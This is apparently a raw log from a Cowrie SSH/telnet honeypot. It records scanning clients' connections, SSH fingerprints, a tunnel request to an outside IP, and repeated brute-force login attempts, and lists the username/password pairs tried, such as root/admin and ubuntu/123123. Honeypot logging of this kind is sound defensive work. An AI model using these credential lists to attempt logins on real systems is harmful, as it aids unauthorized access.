{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:37:28.569958Z","src_ip":"212.227.125.160","session":"0cd3516ac596"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:37:28.759351Z","src_ip":"212.227.125.160","session":"0cd3516ac596"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"12345678","message":"login attempt [ubuntu/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T11:37:29.749664Z","src_ip":"212.227.125.160","session":"0cd3516ac596"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:37:30.941684Z","src_ip":"212.227.125.160","session":"0cd3516ac596"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:37:36.073272Z","src_ip":"212.227.235.229","session":"d535ee726204"}
{"eventid":"cowrie.session.closed","duration":"30.1","message":"Connection lost after 30.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:37:36.359231Z","src_ip":"212.227.235.229","session":"30948ba29ec2"}
{"eventid":"cowrie.session.closed","duration":"12.2","message":"Connection lost after 12.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:37:36.360076Z","src_ip":"212.227.235.229","session":"d535ee726204"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53684,"dst_ip":"1.2.3.4","dst_port":22,"session":"5eac95041b0d","protocol":"ssh","message":"New connection: 212.227.125.160:53684 (1.2.3.4:22) [session: 5eac95041b0d]","sensor":"my-vps","timestamp":"2025-08-28T11:37:46.094598Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:37:46.095493Z","src_ip":"212.227.125.160","session":"5eac95041b0d"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T11:37:46.154526Z","src_ip":"212.227.125.160","session":"5eac95041b0d"}
{"eventid":"cowrie.login.failed","username":"solana","password":"Solana","message":"login attempt [solana/Solana] failed","sensor":"my-vps","timestamp":"2025-08-28T11:37:46.333811Z","src_ip":"212.227.125.160","session":"5eac95041b0d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":483,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:37:46.473444Z","src_ip":"212.227.125.160","session":"ebdc1cbfe355"}
{"eventid":"cowrie.session.closed","duration":180.35487580299377,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:37:46.476534Z","src_ip":"212.227.125.160","session":"ebdc1cbfe355"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:37:47.394642Z","src_ip":"212.227.125.160","session":"5eac95041b0d"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.112","src_port":36732,"dst_ip":"1.2.3.4","dst_port":22,"session":"fbb4634ec18c","protocol":"ssh","message":"New connection: 80.94.95.112:36732 (1.2.3.4:22) [session: fbb4634ec18c]","sensor":"my-vps","timestamp":"2025-08-28T11:37:59.886567Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T11:37:59.887263Z","src_ip":"80.94.95.112","session":"fbb4634ec18c"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T11:37:59.917711Z","src_ip":"80.94.95.112","session":"fbb4634ec18c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"999111","message":"login attempt [admin/999111] failed","sensor":"my-vps","timestamp":"2025-08-28T11:38:00.123165Z","src_ip":"80.94.95.112","session":"fbb4634ec18c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"987654321q","message":"login attempt [admin/987654321q] failed","sensor":"my-vps","timestamp":"2025-08-28T11:38:01.156561Z","src_ip":"80.94.95.112","session":"fbb4634ec18c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"979797","message":"login attempt [admin/979797] failed","sensor":"my-vps","timestamp":"2025-08-28T11:38:02.189767Z","src_ip":"80.94.95.112","session":"fbb4634ec18c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"929292","message":"login attempt [admin/929292] failed","sensor":"my-vps","timestamp":"2025-08-28T11:38:03.221632Z","src_ip":"80.94.95.112","session":"fbb4634ec18c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"885522","message":"login attempt [admin/885522] failed","sensor":"my-vps","timestamp":"2025-08-28T11:38:04.254703Z","src_ip":"80.94.95.112","session":"fbb4634ec18c"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:38:05.287700Z","src_ip":"80.94.95.112","session":"fbb4634ec18c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42366,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc83a08814fc","protocol":"ssh","message":"New connection: 212.227.125.160:42366 (1.2.3.4:22) [session: fc83a08814fc]","sensor":"my-vps","timestamp":"2025-08-28T11:38:14.987672Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:38:15.000736Z","src_ip":"212.227.125.160","session":"fc83a08814fc"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:38:15.156475Z","src_ip":"212.227.125.160","session":"fc83a08814fc"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"qwerty","message":"login attempt [ubuntu/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-28T11:38:15.992342Z","src_ip":"212.227.125.160","session":"fc83a08814fc"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:38:17.276502Z","src_ip":"212.227.125.160","session":"fc83a08814fc"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":58558,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f7fed5e622c","protocol":"ssh","message":"New connection: 217.72.205.35:58558 (1.2.3.4:22) [session: 9f7fed5e622c]","sensor":"my-vps","timestamp":"2025-08-28T11:38:20.639726Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:38:20.641059Z","src_ip":"217.72.205.35","session":"9f7fed5e622c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":22236,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e557342850e","protocol":"ssh","message":"New connection: 212.227.235.229:22236 (1.2.3.4:22) [session: 2e557342850e]","sensor":"my-vps","timestamp":"2025-08-28T11:38:22.057948Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:38:22.059301Z","src_ip":"212.227.235.229","session":"2e557342850e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":22581,"dst_ip":"1.2.3.4","dst_port":22,"session":"e375ed7a1140","protocol":"ssh","message":"New connection: 212.227.235.229:22581 (1.2.3.4:22) [session: e375ed7a1140]","sensor":"my-vps","timestamp":"2025-08-28T11:38:22.158199Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:38:22.159153Z","src_ip":"212.227.235.229","session":"e375ed7a1140"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T11:38:22.289650Z","src_ip":"212.227.235.229","session":"e375ed7a1140"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:38:22.682975Z","src_ip":"212.227.235.229","session":"e375ed7a1140"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T11:38:22.814093Z","session":"e375ed7a1140"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56230,"dst_ip":"1.2.3.4","dst_port":22,"session":"0065e1c37019","protocol":"ssh","message":"New connection: 212.227.125.160:56230 (1.2.3.4:22) [session: 0065e1c37019]","sensor":"my-vps","timestamp":"2025-08-28T11:39:03.425567Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:39:03.466843Z","src_ip":"212.227.125.160","session":"0065e1c37019"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:39:03.631505Z","src_ip":"212.227.125.160","session":"0065e1c37019"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"123123","message":"login attempt [ubuntu/123123] failed","sensor":"my-vps","timestamp":"2025-08-28T11:39:04.375965Z","src_ip":"212.227.125.160","session":"0065e1c37019"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:39:05.568457Z","src_ip":"212.227.125.160","session":"0065e1c37019"}
{"eventid":"cowrie.session.connect","src_ip":"37.143.61.47","src_port":35682,"dst_ip":"1.2.3.4","dst_port":22,"session":"184103a40f20","protocol":"ssh","message":"New connection: 37.143.61.47:35682 (1.2.3.4:22) [session: 184103a40f20]","sensor":"my-vps","timestamp":"2025-08-28T11:39:28.800374Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:39:28.801279Z","src_ip":"37.143.61.47","session":"184103a40f20"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T11:39:28.833180Z","src_ip":"37.143.61.47","session":"184103a40f20"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:39:32.159296Z","src_ip":"212.227.235.229","session":"e375ed7a1140"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:39:36.186445Z","src_ip":"37.143.61.47","session":"184103a40f20"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57846,"dst_ip":"1.2.3.4","dst_port":23,"session":"88421f0f03b5","protocol":"telnet","message":"New connection: 212.227.125.160:57846 (1.2.3.4:23) [session: 88421f0f03b5]","sensor":"my-vps","timestamp":"2025-08-28T11:39:46.629055Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:39:46.711996Z","src_ip":"212.227.125.160","session":"88421f0f03b5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:39:46.728374Z","src_ip":"212.227.125.160","session":"88421f0f03b5"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-28T11:39:46.729605Z","src_ip":"212.227.125.160","session":"88421f0f03b5"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-28T11:39:46.730448Z","src_ip":"212.227.125.160","session":"88421f0f03b5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37692,"dst_ip":"1.2.3.4","dst_port":22,"session":"39e81caa2138","protocol":"ssh","message":"New connection: 212.227.125.160:37692 (1.2.3.4:22) [session: 39e81caa2138]","sensor":"my-vps","timestamp":"2025-08-28T11:39:49.501383Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:39:49.502316Z","src_ip":"212.227.125.160","session":"39e81caa2138"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:39:49.667143Z","src_ip":"212.227.125.160","session":"39e81caa2138"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"111111","message":"login attempt [ubuntu/111111] failed","sensor":"my-vps","timestamp":"2025-08-28T11:39:50.166164Z","src_ip":"212.227.125.160","session":"39e81caa2138"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:39:51.334038Z","src_ip":"212.227.125.160","session":"39e81caa2138"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47012,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb37b6d16547","protocol":"ssh","message":"New connection: 212.227.125.160:47012 (1.2.3.4:22) [session: bb37b6d16547]","sensor":"my-vps","timestamp":"2025-08-28T11:40:33.479203Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:40:33.489406Z","src_ip":"212.227.125.160","session":"bb37b6d16547"}
